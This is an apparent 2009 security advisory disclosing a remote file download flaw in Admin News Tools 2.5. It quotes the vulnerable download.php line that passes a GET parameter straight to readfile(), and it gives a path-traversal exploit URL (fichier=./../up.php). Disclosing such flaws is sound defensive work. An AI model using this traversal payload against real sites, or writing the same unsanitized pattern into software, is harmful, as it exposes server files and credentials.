Admin News Tools 2.5 Remote File Download Vulnerability

2009-07-16T00:00:00
ID SECURITYVULNS:DOC:22171
Type securityvulns
Reporter Securityvulns
Modified 2009-07-16T00:00:00

Description

################### Securitylab.ir

Application Info:

Name: Admin News Tools

Version: 2.5

Website: http://www.adminnewstools.fr.nf

Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip

Discoverd By: Securitylab.ir

Website: http://securitylab.ir

Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

Vulnerability Info:

Type: Remote File Download Vulnerability

Risk: Medium

===========================================================

Download.php

header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));

readfile($_GET['fichier']);

}

http://www.site.com/news/system/download.php?fichier=./../up.php

===========================================================

Securitylab Security Research Team